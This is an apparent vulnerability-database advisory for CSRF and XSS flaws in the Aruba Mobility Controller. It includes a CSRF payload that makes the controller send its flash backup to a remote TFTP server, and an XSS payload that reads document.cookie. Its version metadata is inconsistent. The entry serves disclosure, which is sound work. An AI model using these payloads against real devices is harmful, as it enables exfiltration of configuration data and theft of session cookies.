vendor:
Mobility Controller
by:
Itzik Chen
4,3
CVSS
MEDIUM
CSRF and XSS
352
CWE
Product Name: Mobility Controller
Affected Version From: 6.4.2.8
Affected Version To: 6.4.2.8
Patch Exists: Yes
Related CWE: N/A
CPE: h:arubanetworks:mobility_controller
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Aruba7240, Ver 6.2.4.8
2015
Aruba Mobility Controller CSRF And XSS Vulnerabilities
Aruba Networks is an HP company, one of the leaders in enterprise Wi-Fi. Arube Controller suffers from CSRF and XSS vulnerabilities. Proof of Concept - CSRF: 192.168.0.1 - Controller IP-Address 172.17.0.1 - Remote TFTP server <IMG width=1 height=1 SRC="'https://192.168.0.1:4343/screens/cmnutil/copyLocalFileToTftpServerWeb.xml?flashbackup.tar.gz,172.17.0.1,flashbackup.tar.gz'"> Proof of Concept - XSS: https://192.168.0.1:4343/screens/switch/switch_mon.html?mode=plog-custom&mode-title=test</td><img width=1 height=1 src=/images/logo-mobility-controller.gif onLOAD=alert(document.cookie)>
Mitigation:
Ensure that the Aruba Mobility Controller is updated to the latest version and that all security patches are applied.
